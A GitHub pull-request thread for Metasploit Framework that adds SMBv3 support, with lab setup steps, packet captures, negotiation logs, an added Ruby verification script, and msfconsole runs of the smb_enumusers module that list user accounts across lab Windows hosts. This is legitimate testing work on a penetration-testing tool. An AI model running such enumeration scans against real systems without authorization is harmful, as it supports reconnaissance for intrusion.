SMBv3 integration with Framework #13417

Merged
merged 16 commits into from
Jun 24, 2020
Conversation

cdelafuente-r7
Contributor

@cdelafuente-r7 cdelafuente-r7 commented May 7, 2020

This adds SMBv3 support to Framework by including the latest changes to the ruby_smb library. It depends on this PR to be merged.
EDIT: The ruby_smb PR is merged now.

This also adds two new options for the SMB client:

  • SMB::ProtocolVersion: One or a list of comma-separated SMB protocol versions to negotiate (e.g. "1" or "1,2" or "2,3,1")
  • SMB::AlwaysEncrypt: Enforces encryption even if the server does not require it (SMB3.x only). Note that when it is set to false, the SMB client will still encrypt the communication if the server requires it

One of the biggest changes is that ruby_smb is now the default client, which means SMB versions 1, 2 and 3 are automatically negotiated, unless specified otherwise. Some modules still require Rex SMB client and were updated to force its use. As a consequence, these modules will only be able to use SMBv1.

Verification Steps

Windows target setup

  • SMB2 support from Windows Vista and Server 2008.
  • SMB3 support from Windows 8 and Windows Server 2012.
  • Best to test against multiple Windows supporting different SMB versions.
  • Note that encryption is only available with SMBv3.
  • Setup at least one share folder and give an administrator user full permissions (you can also restrict permissions for testing access control)

To get the current configuration state of the SMB server, run this in PowerShell:

Get-SmbServerConfiguration

To disable SMBv1, run this in an elevated PowerShell:

Set-SmbServerConfiguration -EnableSMB1Protocol $false

To disable SMBv2 and SMBv3 (it is not possible to disable one separately), run this in an elevated PowerShell:

Set-SmbServerConfiguration -EnableSMB2Protocol $false

Change $false to $true to re-enable the protocol versions using the same PowerShell command.

To require encryption on the server (SMB3), run this in an elevated PowerShell:

Set-SmbServerConfiguration -EncryptData $true

To enable per-share encryption on the server (SMB3), run this in an elevated PowerShell:

Set-SmbServerConfiguration -EncryptData $false
Set-SmbShare -Name <share name> -EncryptData 1

Samba target setup

The easiest way is to use docker and dperson/samba.
The following command will create and start a container running on ports 139 and 445, with user smbuser (password 123456) and with a share called home (sharing local path /share). Note that -S will disable SMB2 minimum version, which means SMB1 will be available. Remove it if you don't want SMB1 support.

docker run --name samba_container --rm -it -p 139:139 -p 445:445 -d dperson/samba -p -u 'smbuser;123456' -s 'home;/share' -S

Monitoring setup

I recommend using Wireshark, capturing on ports 139 and 445 and displaying only SMB packets:

  • Capture filter: tcp port 445 || tcp port 139
  • Display filter: smb||smb2

Also, open a separate terminal to check the logs:

tail -f ~/.msf4/logs/framework.log

Tests

Example with the modules/auxiliary/scanner/smb/smb_enumusers module.

msf5 > use modules/auxiliary/scanner/smb/smb_enumusers
msf5 auxiliary(scanner/smb/smb_enumusers) > set SMBUser smbtest
SMBUser => smbtest
msf5 auxiliary(scanner/smb/smb_enumusers) > set SMBPass 123456
SMBPass => 123456
msf5 auxiliary(scanner/smb/smb_enumusers) > set verbose true
verbose => true
msf5 auxiliary(scanner/smb/smb_enumusers) > set RHOSTS 172.16.60.218
RHOSTS => 172.16.60.218
msf5 auxiliary(scanner/smb/smb_enumusers) > show options

Module options (auxiliary/scanner/smb/smb_enumusers):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DB_ALL_USERS  false            no        Add all enumerated usernames to the database
   RHOSTS        172.16.60.218    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SMBDomain     .                no        The Windows domain to use for authentication
   SMBPass       123456           no        The password for the specified username
   SMBUser       smbtest          no        The username to authenticate as
   THREADS       1                yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 172.16.60.218:445     - WIN-POFO2P6ER44 [ Administrator, DefaultAccount, Guest, user11, smbtest, sqltest ] ( LockoutTries=0 PasswordMin=0 )
[*] 172.16.60.218:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Verify the SMB version that has been negotiated in the logs:

[05/29/2020 12:25:00] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[05/29/2020 12:25:00] [d(0)] core: Negotiated SMB version: SMB3

In this case, the client asked for version 1, 2 or 3 and the server picked SMBv3. The communication should be encrypted by default. You can verify this in Wireshark:

No.	Time	Stream	Source	Src port	Destination	Dst port	Protocol	Length	Info	SMB dialect
38	95.942267	3	172.16.60.1	65451	172.16.60.218	445	SMB	139	Negotiate Protocol Request	NT LM 0.12,SMB 2.002,SMB 2.???
39	95.942637	3	172.16.60.218	445	172.16.60.1	65451	SMB2	240	Negotiate Protocol Response	SMB2 wildcard
41	95.951575	3	172.16.60.1	65451	172.16.60.218	445	SMB2	270	Negotiate Protocol Request	SMB 2.0.2,SMB 2.1,SMB 3.0,SMB 3.0.2,SMB 3.1.1
42	95.951969	3	172.16.60.218	445	172.16.60.1	65451	SMB2	306	Negotiate Protocol Response	SMB 3.1.1
44	95.957149	3	172.16.60.1	65451	172.16.60.218	445	SMB2	236	Session Setup Request, NTLMSSP_NEGOTIATE	
45	95.957496	3	172.16.60.218	445	172.16.60.1	65451	SMB2	413	Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE	
47	95.960708	3	172.16.60.1	65451	172.16.60.218	445	SMB2	516	Session Setup Request, NTLMSSP_AUTH, User: .\smbtest	
49	95.977647	3	172.16.60.218	445	172.16.60.1	65451	SMB2	151	Session Setup Response	
51	95.982281	3	172.16.60.1	65451	172.16.60.218	445	SMB2	234	Encrypted SMB3	
52	95.986995	3	172.16.60.218	445	172.16.60.1	65451	SMB2	202	Encrypted SMB3	
54	95.993498	3	172.16.60.1	65451	172.16.60.218	445	SMB2	254	Encrypted SMB3	
55	95.999835	3	172.16.60.218	445	172.16.60.1	65451	SMB2	274	Encrypted SMB3	
...

Note that encryption should occur only after the session setup.

You can test the two new options (when available):

  • Test SMBv1 only:

    msf5 auxiliary(scanner/smb/smb_enumusers) > set SMB::ProtocolVersion 1
    
  • Verify the log shows the correct version:

    [05/29/2020 12:32:14] [d(0)] core: SMB version(s) to negotiate: [1]
    [05/29/2020 12:32:14] [d(0)] core: Negotiated SMB version: SMB1
    
  • Verify the packet capture shows only SMB1 packets.

  • Test SMBv1 and SMBv2:

    msf5 auxiliary(scanner/smb/smb_enumusers) > set SMB::ProtocolVersion 1,2
    
  • Verify the log shows the correct version:

    [05/29/2020 12:36:02] [d(0)] core: SMB version(s) to negotiate: [1, 2]
    [05/29/2020 12:36:02] [d(0)] core: Negotiated SMB version: SMB2
    
  • Verify the packet capture shows only SMB2 packets.

  • Disable SMB2 (see Windows target setup) and re-run the test.

  • Verify the log shows the correct version:

    [05/29/2020 12:38:02] [d(0)] core: SMB version(s) to negotiate: [1, 2]
    [05/29/2020 12:38:02] [d(0)] core: Negotiated SMB version: SMB1
    
  • Verify the packet capture shows only SMB1 packets.

  • Try other combinations

  • Test SMB3 without encryption (SMB3 and encryption should be enabled on the server):

    msf5 auxiliary(scanner/smb/smb_enumusers) > set SMB::ProtocolVersion 1,2,3
    SMB::ProtocolVersion => 1,2,3
    msf5 auxiliary(scanner/smb/smb_enumusers) > set SMB::AlwaysEncrypt false
    SMB::AlwaysEncrypt => false
    
  • Verify the SMB version that has been negotiated in the logs:

    [05/29/2020 12:25:00] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
    [05/29/2020 12:25:00] [d(0)] core: Negotiated SMB version: SMB3
    
  • Verify the packet capture shows only SMB3 packets without encryption.
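The checks below are an added example and are not code from this PR, from Framework or from ruby_smb. They turn the verification steps of the description into three small Ruby functions: one parses the SMB::ProtocolVersion option string, one reads the framework.log lines quoted above and flags a negotiated version the client never asked for, and one reads a tab-separated Wireshark export with the columns shown above and confirms that "Encrypted SMB3" frames appear only after the session setup succeeded. Function names are the example's own; the log lines and packet listing are constructed samples copied from the PR description.

```ruby
# Added example, not code from the PR, Framework or ruby_smb. Function names
# are this example's own; sample data is copied from the PR description.

# 1. SMB::ProtocolVersion: "1", "1,2", "2,3,1" -> ordered, de-duplicated integers.
def parse_protocol_versions(option)
  raise ArgumentError, 'SMB::ProtocolVersion must not be empty' if option.to_s.strip.empty?
  option.split(',').map do |v|
    v = v.strip
    raise ArgumentError, "invalid SMB protocol version: #{v.inspect}" unless v.match?(/\A[123]\z/)
    v.to_i
  end.uniq
end

LOG_REQUESTED  = /core: SMB version\(s\) to negotiate: \[([\d, ]+)\]/
LOG_NEGOTIATED = /core: Negotiated SMB version: SMB(\d)/

# 2. Pair each "Negotiated SMB version" log entry with the most recent
# "SMB version(s) to negotiate" entry and flag a negotiated version that was
# not requested. Reliable with THREADS 1; with several threads the entries of
# different connections interleave, as in the scan logs later in this thread.
def check_negotiation_log(lines)
  requested = nil
  lines.each_with_object([]) do |line, results|
    if (m = LOG_REQUESTED.match(line))
      requested = m[1].split(',').map { |v| v.strip.to_i }
    elsif (m = LOG_NEGOTIATED.match(line))
      negotiated = m[1].to_i
      results << { requested: requested, negotiated: negotiated,
                   ok: !requested.nil? && requested.include?(negotiated) }
    end
  end
end

# 3. Tab-separated Wireshark export (columns as in the PR description). Reports
# the dialect from the last Negotiate Protocol Response, the frame numbers of
# any "Encrypted SMB3" frames seen before the session setup succeeded (there
# should be none) and how many were seen after it.
def check_capture_encryption(listing)
  rows = listing.lines.map(&:chomp).reject(&:empty?).map { |l| l.split("\t") }
  header = rows.shift
  no_i, info_i, dialect_i = header.index('No.'), header.index('Info'), header.index('SMB dialect')
  dialect = nil
  session_done = false
  before = []
  after = 0
  rows.each do |r|
    info = r[info_i].to_s
    if info.start_with?('Negotiate Protocol Response')
      dialect = r[dialect_i] unless r[dialect_i].to_s.empty?
    elsif info.start_with?('Session Setup Response') && !info.include?('Error:')
      session_done = true   # a response without an NTSTATUS error ends the setup
    elsif info.include?('Encrypted SMB3')
      if session_done
        after += 1
      else
        before << r[no_i].to_i
      end
    end
  end
  { dialect: dialect, encrypted_before_session: before,
    encrypted_after_session: after, ok: before.empty? }
end

# Constructed sample: the two log lines quoted in the PR description.
SAMPLE_LOG = <<~LOG.freeze
  [05/29/2020 12:25:00] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
  [05/29/2020 12:25:00] [d(0)] core: Negotiated SMB version: SMB3
LOG

# Constructed sample: frames 38-55 of the PR's capture as a tab-separated export.
CLIENT = %w[172.16.60.1 65451].freeze
SERVER = %w[172.16.60.218 445].freeze

def frame(no, time, src, dst, proto, len, info, dialect = '')
  [no, time, 3, *src, *dst, proto, len, info, dialect].join("\t")
end

SAMPLE_LISTING = [
  ['No.', 'Time', 'Stream', 'Source', 'Src port', 'Destination', 'Dst port',
   'Protocol', 'Length', 'Info', 'SMB dialect'].join("\t"),
  frame(38, '95.942267', CLIENT, SERVER, 'SMB', 139, 'Negotiate Protocol Request', 'NT LM 0.12,SMB 2.002,SMB 2.???'),
  frame(39, '95.942637', SERVER, CLIENT, 'SMB2', 240, 'Negotiate Protocol Response', 'SMB2 wildcard'),
  frame(41, '95.951575', CLIENT, SERVER, 'SMB2', 270, 'Negotiate Protocol Request', 'SMB 2.0.2,SMB 2.1,SMB 3.0,SMB 3.0.2,SMB 3.1.1'),
  frame(42, '95.951969', SERVER, CLIENT, 'SMB2', 306, 'Negotiate Protocol Response', 'SMB 3.1.1'),
  frame(44, '95.957149', CLIENT, SERVER, 'SMB2', 236, 'Session Setup Request, NTLMSSP_NEGOTIATE'),
  frame(45, '95.957496', SERVER, CLIENT, 'SMB2', 413, 'Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE'),
  frame(47, '95.960708', CLIENT, SERVER, 'SMB2', 516, 'Session Setup Request, NTLMSSP_AUTH, User: .\\smbtest'),
  frame(49, '95.977647', SERVER, CLIENT, 'SMB2', 151, 'Session Setup Response'),
  frame(51, '95.982281', CLIENT, SERVER, 'SMB2', 234, 'Encrypted SMB3'),
  frame(52, '95.986995', SERVER, CLIENT, 'SMB2', 202, 'Encrypted SMB3'),
  frame(54, '95.993498', CLIENT, SERVER, 'SMB2', 254, 'Encrypted SMB3'),
  frame(55, '95.999835', SERVER, CLIENT, 'SMB2', 274, 'Encrypted SMB3')
].join("\n").freeze

if __FILE__ == $PROGRAM_NAME
  p parse_protocol_versions('2,3,1')          # [2, 3, 1]
  p check_negotiation_log(SAMPLE_LOG.lines)    # negotiated 3, ok: true
  p check_capture_encryption(SAMPLE_LISTING)   # dialect "SMB 3.1.1", ok: true
end
```

To use it on a real run, export the Wireshark packet list with File > Export Packet Dissections > As CSV (or copy the rows as tab-separated text) and feed it to check_capture_encryption, and pipe the tail of ~/.msf4/logs/framework.log to check_negotiation_log. An "Encrypted SMB3" frame reported in encrypted_before_session, or an ok: false from the log check, is what a regression in the negotiation or in the encryption start point would look like.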

@jmartin-tech
Contributor

@msjenkins-r7 test this please.


@cdelafuente-r7 cdelafuente-r7 added enhancement rubysmb blocked Blocked by one or more additional tasks labels May 11, 2020
@cdelafuente-r7 cdelafuente-r7 marked this pull request as ready for review May 13, 2020 15:15
@cdelafuente-r7 cdelafuente-r7 changed the title WIP: SMBv3 integration with Framework SMBv3 integration with Framework May 13, 2020
@smcintyre-r7
Contributor

@cdelafuente-r7 would you be able to please rebase / retarget this for merging into the 6.x branch rather than master?

@cdelafuente-r7 cdelafuente-r7 changed the base branch from master to 6.x May 28, 2020 17:22
@cdelafuente-r7
Contributor Author

Sure! I retargeted the PR. Thanks!

@smcintyre-r7 smcintyre-r7 self-assigned this Jun 8, 2020
@cdelafuente-r7 cdelafuente-r7 removed the blocked Blocked by one or more additional tasks label Jun 8, 2020
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Changes look good, I'll move on to testing as many of the modules as I can.

@@ -144,17 +165,23 @@ def smb_login(simple_client = self.simple)
datastore['SMB::Native_LM'],
{:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost}
)
# XXX: Any reason to connect to the IPC$ share in this method?
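Review bot: the `# XXX: Any reason to connect to the IPC$ share in this method?` comment leaves an open question in the code of smb_login rather than resolving it; before merge, either document in that comment why the IPC$ tree connect belongs in the login path or remove the connect. If it stays, make sure the tree connection opened here is disconnected when the session is torn down, since a caller that later connects to IPC$ itself otherwise ends up with two tree connects and the first one is never closed.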
Contributor

I'm guessing it has to do with:

When the named pipe is being created, the process specifies the security that is associated with the pipe, and then makes sure that access is only granted to the specified users or groups.

See: IPC Share and Null Session Behavior in Windows

Contributor Author

IIRC, IPC$ is just a special share that enables named pipe connections to the server. It should only be necessary when a named pipe is needed (e.g. DCERPC requests). Security is set on the named pipe and not on the IPC$ share.

I noticed that when a module needs to connect to a named pipe, it usually connects to the IPC$ share right after smb_login, which creates a duplicate connection to IPC$. This first connection to IPC$ is never closed.

After thinking about it, it might be some kind of "keep-alive" trick. Having an active connection to the IPC$ share may help to avoid a server timeout if the SMB session is not used. I will need to run some tests.

Contributor Author

I tested against different Windows versions (2008R2, 2012, 2016 and 2019) and the behavior remains the same whether this connection to the IPC$ share is established or not: after the session is set up, the server sends a TCP keepalive packet every 2 minutes and an RST after 7 attempts.

I would be inclined to remove it.

@bwatters-r7 bwatters-r7 added the msf6 PRs that need to be landed into the msf 6 branch label Jun 8, 2020
- multiple protocol version negotiation
- SMB 1, 2 and 3 by default
- add SMB::ProtocolVersion option to SMB Client mixin
- Add SMB::AlwaysEncrypt option
- Force SMB1 for SMB fingerprint
- Update smb_netshareenumall
- smb_ms17_010.rb
- psexec_ms17_010.rb
- psexec_psh.rb
- smb_enumshares.rb
- modules/auxiliary/scanner/smb/smb_enumshares.rb
- modules/exploits/linux/samba/setinfopolicy_heap.rb
- modules/exploits/linux/samba/trans2open.rb
- modules/exploits/multi/samba/usermap_script.rb
- modules/exploits/windows/smb/ipass_pipe_exec.rb
- ms17_010_command  and ms17_010_psexec: deregister
  SMB::ProtocolVersion option
- client: update error handling
- is_known_pipename: force SMB1 only for #enumerate_directories and
  update error handling
@bwatters-r7
Contributor

That error on Windows 8.1x86 is consistent.....

msf5 auxiliary(scanner/smb/smb_enumusers) > set rhost 192.168.134.171
rhost => 192.168.134.171
msf5 auxiliary(scanner/smb/smb_enumusers) > run

Error: 192.168.134.171 RubySMB::Error::CommunicationError An error occurred reading from the Socket Connection reset by peer
[*] 192.168.134.171:      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) > 

@bwatters-r7
Contributor

When I drop the SMB version to [1,2], I get a response from the Windows 8.1 x86 machines:

msf5 auxiliary(scanner/smb/smb_enumusers) > set SMB::ProtocolVersion 1,2
SMB::ProtocolVersion => 1,2
msf5 auxiliary(scanner/smb/smb_enumusers) > run

[*] 192.168.134.0/24:     - Scanned  29 of 256 hosts (11% complete)
[*] 192.168.134.0/24:     - Scanned  52 of 256 hosts (20% complete)
[*] 192.168.134.0/24:     - Scanned  77 of 256 hosts (30% complete)
[+] 192.168.134.106:445   - WIN1803X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.104:445   - WIN2019X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.111:445   - WIN10X86_1709 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.109:445   - WIN2016X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 104 of 256 hosts (40% complete)
[+] 192.168.134.114:445   - WIN10X86_1703 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, defaultuser0, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.115:445   - WIN1709X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.119:445   - WIN10X86_1803 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.117:445   - WIN10X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.118:445   - WIN10X64_1703 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, defaultuser0, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.121:445   - WIN10X64_1511 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.123:445   - WIN8X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 129 of 256 hosts (50% complete)
[+] 192.168.134.132:445   - WIN10X64_1709 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.129:445   - WIN10X86 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.146:445   - WIN1809X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.151:445   - WIN2012X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.149:445   - WIN10X64_1607 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.156:445   - WIN81X64SP1 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 154 of 256 hosts (60% complete)
[+] 192.168.134.164:445   - WIN10X64_1809 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.162:445   - WIN81X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.172:445   - WIN2012R2X64SP1 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.171:445   - WIN81X86 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.177:445   - WIN10X64_1803 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.189:445   - WIN81X86SP1 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.185:445   - WIN8X86 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.187:445   - WIN2012R2X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.191:445   - WIN10X86_1809 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.193:445   - WIN10X86_1511 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.192:445   - WIN10X86_1607 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 187 of 256 hosts (73% complete)
[*] 192.168.134.0/24:     - Scanned 205 of 256 hosts (80% complete)
[*] 192.168.134.0/24:     - Scanned 232 of 256 hosts (90% complete)
[*] 192.168.134.0/24:     - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) > 

Logs:

[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:17] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:17] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:17] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:38] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
